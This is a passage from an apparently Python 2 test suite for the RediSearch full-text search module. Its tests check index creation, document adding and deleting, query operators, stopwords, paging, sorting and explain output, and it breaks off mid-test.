env.assertOk(r.execute_command(
"ft.create", "test", "SCHEMA", "tags", "TAG", "waypoint", "GEO"))
env.assertOk(r.execute_command(
"ft.add", "test", "1", "1", "FIELDS", "tags", "alberta", "waypoint", "-113.524,53.5244"))
env.assertOk(r.execute_command(
"ft.add", "test", "2", "1", "FIELDS", "tags", "ontario", "waypoint", "-79.395,43.661667"))
r.cmd('ft.search', 'test', '@tags:{ontario}')
res = r.execute_command(
'ft.search', 'test', "@waypoint:[-113.52 53.52 20 mi]|@tags:{ontario}", 'nocontent')
env.assertEqual(res, [2, '2', '1'])
def testAttributes(env):
env.assertOk(env.cmd('ft.create', 'idx', 'schema',
'title', 'text', 'body', 'text'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields',
'title', 't1 t2', 'body', 't3 t4 t5'))
env.assertOk(env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields',
'body', 't1 t2', 'title', 't3 t5'))
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 0.2}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(@title:(t1 t2) => {$weight: 2.5}) |(@body:(t1 t2) => {$weight: 0.5})', 'nocontent')
env.assertListEqual([2L, 'doc1', 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t3 t5) => {$slop: 4}', 'nocontent')
env.assertListEqual([2L, 'doc2', 'doc1'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0}', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = env.cmd(
'ft.search', 'idx', '(t5 t3) => {$slop: 0; $inorder:true}', 'nocontent')
env.assertListEqual([0], res)
def testUnion(env):
N = 100
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world' if i % 2 == 0 else 'hallo werld'))
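# Even-numbered docs say 'hello world' and odd-numbered ones 'hallo werld',
# so unions that cover both spellings should match all N docs.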
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'hello|hallo', 'nocontent', 'limit', '0', '100')
env.assertEqual(N + 1, len(res))
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'hello|world', 'nocontent', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command('ft.search', 'idx', '(hello|hello)(world|world)',
'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo)(werld|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hallo|hello)(world|werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|werld)(hallo|world)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello|hallo) world', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(51, len(res))
env.assertEqual(50, res[0])
res = r.execute_command(
'ft.search', 'idx', '(hello world)|((hello world)|(hallo world|werld) | hello world werld)', 'nocontent', 'verbatim', 'limit', '0', '100')
env.assertEqual(101, len(res))
env.assertEqual(100, res[0])
def testSearch(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'title', 'text', 'weight', 10.0, 'body', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 0.5, 'fields',
'title', 'hello world',
'body', 'lorem ist ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'title', 'hello another world',
'body', 'lorem ist ipsum lorem lorem'))
for _ in r.retry_with_rdb_reload():
res = r.execute_command('ft.search', 'idx', 'hello')
env.assertTrue(len(res) == 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(isinstance(res[2], list))
env.assertTrue('title' in res[2])
env.assertTrue('hello another world' in res[2])
env.assertEqual(res[3], "doc1")
env.assertTrue('hello world' in res[4])
# Test empty query
res = r.execute_command('ft.search', 'idx', '')
env.assertListEqual([0], res)
# Test searching with no content
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent')
env.assertTrue(len(res) == 3)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertEqual(res[2], "doc1")
# Test searching WITHSCORES
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES')
env.assertEqual(len(res), 7)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[4], "doc1")
env.assertTrue(float(res[5]) > 0)
# Test searching WITHSCORES NOCONTENT
res = r.execute_command(
'ft.search', 'idx', 'hello', 'WITHSCORES', 'NOCONTENT')
env.assertEqual(len(res), 5)
env.assertEqual(res[0], 2L)
env.assertEqual(res[1], "doc2")
env.assertTrue(float(res[2]) > 0)
env.assertEqual(res[3], "doc1")
env.assertTrue(float(res[4]) > 0)
def testSearchNosave(env):
# Check to see what happens when we try to return unsaved documents
env.cmd('ft.create', 'idx', 'SCHEMA', 'f1', 'text')
# Add 3 documents
for x in range(3):
env.cmd('ft.add', 'idx', 'doc{}'.format(x),
1.0, 'NOSAVE', 'FIELDS', 'f1', 'value')
# Now query the results
res = env.cmd('ft.search', 'idx', 'value')
env.assertEqual(3, res[0])
for content in res[2::2]:
env.assertEqual([], content)
def testGet(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello world', 'bar', 'wat wat'))
for i in range(100):
res = r.execute_command('ft.get', 'idx', 'doc%d' % i)
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
env.assertIsNone(r.execute_command(
'ft.get', 'idx', 'doc%dsdfsd' % i))
rr = r.execute_command(
'ft.mget', 'idx', *('doc%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNotNone(res)
env.assertListEqual(
['foo', 'hello world', 'bar', 'wat wat'], res)
rr = r.execute_command(
'ft.mget', 'idx', *('doc-%d' % i for i in range(100)))
env.assertEqual(len(rr), 100)
for res in rr:
env.assertIsNone(res)
# Verify that when a document is deleted, GET returns NULL
r.cmd('ft.del', 'idx', 'doc10') # But we still keep the document
r.cmd('ft.del', 'idx', 'doc11')
res = r.cmd('ft.get', 'idx', 'doc10')
r.assertEqual(None, res)
res = r.cmd('ft.mget', 'idx', 'doc10', 'doc11', 'doc12')
r.assertIsNone(res[0])
r.assertIsNone(res[1])
r.assertTrue(not not res[2])
def testDelete(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
for i in range(100):
# the doc hash should exist now
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
# Delete the actual docs only half of the time
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i, 'DD' if i % 2 == 0 else ''))
# second delete should return 0
env.assertEqual(0, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
# After del with DD the doc hash should not exist
if i % 2 == 0:
env.assertFalse(r.exists('doc%d' % i))
else:
r.expect('ft.get', 'idx', 'doc%d' % i).notRaiseError()
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertNotIn('doc%d' % i, res)
env.assertEqual(res[0], 100 - i - 1)
env.assertEqual(len(res), 100 - i)
# test reinsertion
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 100)
env.assertIn('doc%d' % i, res)
env.assertEqual(1, r.execute_command(
'ft.del', 'idx', 'doc%d' % i))
for _ in r.retry_with_rdb_reload():
did = 'rrrr'
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
env.assertOk(r.execute_command('ft.add', 'idx', did, 1, 'fields',
'f', 'hello world'))
env.assertEqual(1, r.execute_command('ft.del', 'idx', did))
env.assertEqual(0, r.execute_command('ft.del', 'idx', did))
def testReplace(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', 1.0, 'fields',
'f', 'hello world'))
res = r.execute_command(
'ft.search', 'idx', 'hello world')
env.assertEqual(2, res[0])
with env.assertResponseError():
# make sure we can't insert a doc twice
res = r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'fields',
'f', 'hello world')
# now replace doc1 with a different content
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', 1.0, 'replace', 'fields',
'f', 'goodbye universe'))
for _ in r.retry_with_rdb_reload():
# make sure the query for hello world does not return the replaced
# document
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc2', res[1])
# search for the doc's new content
res = r.execute_command(
'ft.search', 'idx', 'goodbye universe', 'nocontent')
env.assertEqual(1, res[0])
env.assertEqual('doc1', res[1])
def testDrop(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
env.assertOk(r.execute_command('ft.drop', 'idx'))
keys = r.keys('*')
env.assertEqual(0, len(keys))
# Now do the same with KEEPDOCS
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'f', 'text', 'n', 'numeric', 't', 'tag', 'g', 'geo'))
for i in range(100):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'f', 'hello world', 'n', 666, 't', 'foo bar',
'g', '19.04,47.497'))
keys = r.keys('*')
env.assertGreaterEqual(len(keys), 100)
if not env.is_cluster():
env.assertOk(r.execute_command('ft.drop', 'idx', 'KEEPDOCS'))
keys = r.keys('*')
env.assertListEqual(['doc0', 'doc1', 'doc10', 'doc11', 'doc12', 'doc13', 'doc14', 'doc15', 'doc16', 'doc17', 'doc18', 'doc19', 'doc2', 'doc20', 'doc21', 'doc22', 'doc23', 'doc24', 'doc25', 'doc26', 'doc27', 'doc28', 'doc29', 'doc3', 'doc30', 'doc31', 'doc32', 'doc33', 'doc34', 'doc35', 'doc36', 'doc37', 'doc38', 'doc39', 'doc4', 'doc40', 'doc41', 'doc42', 'doc43', 'doc44', 'doc45', 'doc46', 'doc47', 'doc48', 'doc49', 'doc5', 'doc50', 'doc51', 'doc52', 'doc53',
'doc54', 'doc55', 'doc56', 'doc57', 'doc58', 'doc59', 'doc6', 'doc60', 'doc61', 'doc62', 'doc63', 'doc64', 'doc65', 'doc66', 'doc67', 'doc68', 'doc69', 'doc7', 'doc70', 'doc71', 'doc72', 'doc73', 'doc74', 'doc75', 'doc76', 'doc77', 'doc78', 'doc79', 'doc8', 'doc80', 'doc81', 'doc82', 'doc83', 'doc84', 'doc85', 'doc86', 'doc87', 'doc88', 'doc89', 'doc9', 'doc90', 'doc91', 'doc92', 'doc93', 'doc94', 'doc95', 'doc96', 'doc97', 'doc98', 'doc99'], sorted(keys))
def testCustomStopwords(env):
r = env
# Index with default stopwords
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
# Index with custom stopwords
env.assertOk(r.execute_command('ft.create', 'idx2', 'stopwords', 2, 'hello', 'world',
'schema', 'foo', 'text'))
# Index with NO stopwords
env.assertOk(r.execute_command('ft.create', 'idx3', 'stopwords', 0,
'schema', 'foo', 'text'))
for idx in ('idx', 'idx2', 'idx3'):
env.assertOk(r.execute_command(
'ft.add', idx, 'doc1', 1.0, 'fields', 'foo', 'hello world'))
env.assertOk(r.execute_command(
'ft.add', idx, 'doc2', 1.0, 'fields', 'foo', 'to be or not to be'))
for _ in r.retry_with_rdb_reload():
# Normal index should return results just for 'hello world'
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent'))
env.assertEqual([0], r.execute_command(
'ft.search', 'idx', 'to be or not', 'nocontent'))
# Custom SW index should return results just for 'to be or not'
env.assertEqual([0], r.execute_command(
'ft.search', 'idx2', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx2', 'to be or not', 'nocontent'))
# No SW index should return results for both
env.assertEqual([1, 'doc1'], r.execute_command(
'ft.search', 'idx3', 'hello world', 'nocontent'))
env.assertEqual([1, 'doc2'], r.execute_command(
'ft.search', 'idx3', 'to be or not', 'nocontent'))
def testStopwords(env):
# This test was taken from Python's tests, and failed due to some changes
# made earlier
env.cmd('ft.create', 'idx', 'stopwords', 3, 'foo',
'bar', 'baz', 'schema', 'txt', 'text')
env.cmd('ft.add', 'idx', 'doc1', 1.0, 'fields', 'txt', 'foo bar')
env.cmd('ft.add', 'idx', 'doc2', 1.0, 'fields', 'txt', 'hello world')
r1 = env.cmd('ft.search', 'idx', 'foo bar', 'nocontent')
r2 = env.cmd('ft.search', 'idx', 'foo bar hello world', 'nocontent')
env.assertEqual(0, r1[0])
env.assertEqual(1, r2[0])
def testNoStopwords(env):
# This test taken from Java's test suite
env.cmd('ft.create', 'idx', 'schema', 'title', 'text')
for i in range(100):
env.cmd('ft.add', 'idx', 'doc{}'.format(i), 1.0, 'fields',
'title', 'hello world' if i % 2 == 0 else 'hello worlds')
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOCONTENT')
env.assertEqual(100, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world',
'VERBATIM', 'NOCONTENT')
env.assertEqual(50, res[0])
res = env.cmd('ft.search', 'idx', 'hello a world', 'NOSTOPWORDS')
env.assertEqual(0, res[0])
def testOptional(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', 1.0, 'fields', 'foo', 'hello wat woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2',
1.0, 'fields', 'foo', 'hello world woot'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc3',
1.0, 'fields', 'foo', 'hello world werld'))
res = r.execute_command('ft.search', 'idx', 'hello', 'nocontent')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([2L, 'doc3', 'doc2'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'hello ~world ~werld', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', '~world ~werld hello', 'nocontent', 'scorer', 'DISMAX')
env.assertEqual([3L, 'doc3', 'doc2', 'doc1'], res)
def testExplain(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
q = '(hello world) "what what" hello|world @bar:[10 100]|@bar:[200 300]'
res = r.execute_command('ft.explain', 'idx', q)
# print res.replace('\n', '\\n')
# expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
# expected = """INTERSECT {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n <HL(expanded)\n +hello(expanded)\n }\n UNION {\n world\n <ARLT(expanded)\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
expected = """INTERSECT {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n EXACT {\n what\n what\n }\n UNION {\n UNION {\n hello\n +hello(expanded)\n }\n UNION {\n world\n +world(expanded)\n }\n }\n UNION {\n NUMERIC {10.000000 <= @bar <= 100.000000}\n NUMERIC {200.000000 <= @bar <= 300.000000}\n }\n}\n"""
env.assertEqual(res, expected)
# expected = ['INTERSECT {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' <HL(expanded)', ' +hello(expanded)', ' }', ' UNION {', ' world', ' <ARLT(expanded)', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
if env.is_cluster():
raise unittest.SkipTest()
res = env.cmd('ft.explainCli', 'idx', q)
expected = ['INTERSECT {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' EXACT {', ' what', ' what', ' }', ' UNION {', ' UNION {', ' hello', ' +hello(expanded)', ' }', ' UNION {', ' world', ' +world(expanded)', ' }', ' }', ' UNION {', ' NUMERIC {10.000000 <= @bar <= 100.000000}', ' NUMERIC {200.000000 <= @bar <= 300.000000}', ' }', '}', '']
env.assertEqual(expected, res)
def testNoIndex(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex', 'sortable'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'hello lorem ipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1, 'doc1'], res)
res = r.execute_command(
'ft.search', 'idx', 'lorem ipsum', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@extra:hello', 'nocontent')
env.assertListEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', '@num:[1 1]', 'nocontent')
env.assertListEqual([0], res)
def testPartial(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema',
'foo', 'text',
'num', 'numeric', 'sortable', 'noindex',
'extra', 'text', 'noindex'))
# print r.execute_command('ft.info', 'idx')
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'fields',
'foo', 'hello world', 'num', 1, 'extra', 'lorem ipsum'))
env.assertOk(r.execute_command('ft.add', 'idx', 'doc2', '0.1', 'fields',
'foo', 'hello world', 'num', 2, 'extra', 'abba'))
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'asc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc1', '#1', 'doc2', '#2'], res)
res = r.execute_command('ft.search', 'idx', 'hello world',
'sortby', 'num', 'desc', 'nocontent', 'withsortkeys')
env.assertListEqual([2L, 'doc2', '#2', 'doc1', '#1'], res)
# Updating non-indexed fields doesn't affect search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'num', 3, 'extra', 'jorem gipsum'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'sortby', 'num', 'desc',)
assertResultsEqual(env, [2L, 'doc1', ['foo', 'hello world', 'num', '3', 'extra', 'jorem gipsum'],
'doc2', ['foo', 'hello world', 'num', '2', 'extra', 'abba']], res)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'withscores')
# Updating only indexed field affects search results
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '0.1', 'replace', 'partial',
'fields', 'foo', 'wat wet'))
res = r.execute_command(
'ft.search', 'idx', 'hello world', 'nocontent')
env.assertListEqual([1L, 'doc2'], res)
res = r.execute_command('ft.search', 'idx', 'wat', 'nocontent')
env.assertListEqual([1L, 'doc1'], res)
# Test updating of score and no fields
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertLess(float(res[2]), 1)
# env.assertListEqual([1L, 'doc1'], res)
env.assertOk(r.execute_command('ft.add', 'idx',
'doc1', '1.0', 'replace', 'partial', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withscores')
env.assertGreater(float(res[2]), 1)
# Test updating payloads
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertIsNone(res[2])
env.assertOk(r.execute_command('ft.add', 'idx', 'doc1', '1.0',
'replace', 'partial', 'payload', 'foobar', 'fields'))
res = r.execute_command(
'ft.search', 'idx', 'wat', 'nocontent', 'withpayloads')
env.assertEqual('foobar', res[2])
def testPaging(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', '%d' % i, 1, 'fields',
'foo', 'hello', 'bar', i))
chunk = 7
offset = 0
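# Page through the full result set with LIMIT offset,chunk using random chunk
# sizes; every page except possibly the last must be full, and ids must arrive
# in descending 'bar' order.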
while True:
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'desc', 'limit', offset, chunk)
env.assertEqual(res[0], N)
if offset + chunk > N:
env.assertTrue(len(res) - 1 <= chunk)
break
env.assertEqual(len(res), chunk + 1)
for n, id in enumerate(res[1:]):
env.assertEqual(int(id), N - 1 - (offset + n))
offset += chunk
chunk = random.randrange(1, 10)
res = r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'sortby', 'bar', 'asc', 'limit', N, 10)
env.assertEqual(res[0], N)
env.assertEqual(len(res), 1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, -1)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', -1, 10)
with env.assertResponseError():
r.execute_command(
'ft.search', 'idx', 'hello', 'nocontent', 'limit', 0, 2000000)
def testPrefix(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'constant term', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'const* term*', 'nocontent')
env.assertEqual(N, res[0])
res = r.execute_command(
'ft.search', 'idx', 'constant term1*', 'nocontent')
env.assertGreater(res[0], 2)
res = r.execute_command(
'ft.search', 'idx', 'const* -term*', 'nocontent')
env.assertEqual([0], res)
res = r.execute_command(
'ft.search', 'idx', 'constant term9*', 'nocontent')
env.assertEqual([0], res)
def testSortBy(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text', 'sortable', 'bar', 'numeric', 'sortable'))
N = 100
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'hello%03d world' % i, 'bar', 100 - i))
for _ in r.retry_with_rdb_reload():
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'foo', 'desc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'desc')
env.assertEqual([100L, 'doc0', 'doc1', 'doc2', 'doc3',
'doc4', 'doc5', 'doc6', 'doc7', 'doc8', 'doc9'], res)
res = r.execute_command(
'ft.search', 'idx', 'world', 'nocontent', 'sortby', 'bar', 'asc')
env.assertEqual([100L, 'doc99', 'doc98', 'doc97', 'doc96',
'doc95', 'doc94', 'doc93', 'doc92', 'doc91', 'doc90'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withscores', 'limit', '2', '5')
env.assertEqual(
[100L, 'doc2', '0', 'doc3', '0', 'doc4', '0', 'doc5', '0', 'doc6', '0'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'bar', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual(
[100L, 'doc0', '#100', 'doc1', '#99', 'doc2', '#98', 'doc3', '#97', 'doc4', '#96'], res)
res = r.execute_command('ft.search', 'idx', 'world', 'nocontent',
'sortby', 'foo', 'desc', 'withsortkeys', 'limit', 0, 5)
env.assertListEqual([100L, 'doc99', '$hello099 world', 'doc98', '$hello098 world', 'doc97', '$hello097 world', 'doc96',
'$hello096 world', 'doc95', '$hello095 world'], res)
def testNot(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'foo', 'text'))
N = 10
for i in range(N):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'foo', 'constant term%d' % (random.randrange(0, 5))))
for i in range(5):
inclusive = r.execute_command(
'ft.search', 'idx', 'constant term%d' % i, 'nocontent', 'limit', 0, N)
exclusive = r.execute_command(
'ft.search', 'idx', 'constant -term%d' % i, 'nocontent', 'limit', 0, N)
exclusive2 = r.execute_command(
'ft.search', 'idx', '-(term%d)' % i, 'nocontent', 'limit', 0, N)
exclusive3 = r.execute_command(
'ft.search', 'idx', '(-term%d) (constant)' % i, 'nocontent', 'limit', 0, N)
env.assertNotEqual(inclusive[0], N)
env.assertEqual(inclusive[0] + exclusive[0], N)
env.assertEqual(exclusive3[0], exclusive2[0])
env.assertEqual(exclusive3[0], exclusive[0])
s1, s2, s3, s4 = set(inclusive[1:]), set(
exclusive[1:]), set(exclusive2[1:]), set(exclusive3[1:])
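# The inclusive set and each exclusive set must be disjoint and together cover
# all N docs, and all three negation forms must agree with each other.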
env.assertTrue(s1.difference(s2) == s1)
env.assertTrue(s1.difference(s3) == s1)
env.assertTrue(s1.difference(s4) == s1)
env.assertTrue(s2 == s3)
env.assertTrue(s2 == s4)
env.assertTrue(s2.intersection(s1) == set())
env.assertTrue(s3.intersection(s1) == set())
env.assertTrue(s4.intersection(s1) == set())
# NOT on a non-existing term
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -dasdfasdf', 'nocontent')[0], N)
# NOT on the same term that is also required ('constant -constant' must match nothing)
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -constant', 'nocontent'), [0])
env.assertEqual(r.execute_command(
'ft.search', 'idx', 'constant -(term0|term1|term2|term3|term4|nothing)', 'nocontent'), [0])
# env.assertEqual(r.execute_command('ft.search', 'idx', 'constant -(term1 term2)', 'nocontent')[0], N)
def testNestedIntersection(env):
r = env
env.assertOk(r.execute_command(
'ft.create', 'idx', 'schema', 'a', 'text', 'b', 'text', 'c', 'text', 'd', 'text'))
for i in range(20):
env.assertOk(r.execute_command('ft.add', 'idx', 'doc%d' % i, 1.0, 'fields',
'a', 'foo', 'b', 'bar', 'c', 'baz', 'd', 'gaz'))
res = [
r.execute_command('ft.search', 'idx',
'foo bar baz gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@a:foo @b:bar @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@b:bar @a:foo @c:baz @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@c:baz @b:bar @a:foo @d:gaz', 'nocontent'),
r.execute_command('ft.search', 'idx',
'@d:gaz @c:baz @b:bar @a:foo', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@a:foo (@b:bar (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@c:baz (@a:foo (@b:bar (@c:baz @d:gaz)))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@b:bar (@a:foo (@c:baz @d:gaz))', 'nocontent'),
r.execute_command(
'ft.search', 'idx', '@d:gaz (@a:foo (@c:baz @b:bar))', 'nocontent'),
r.execute_command('ft.search', 'idx',
'foo (bar baz gaz)', 'nocontent'),
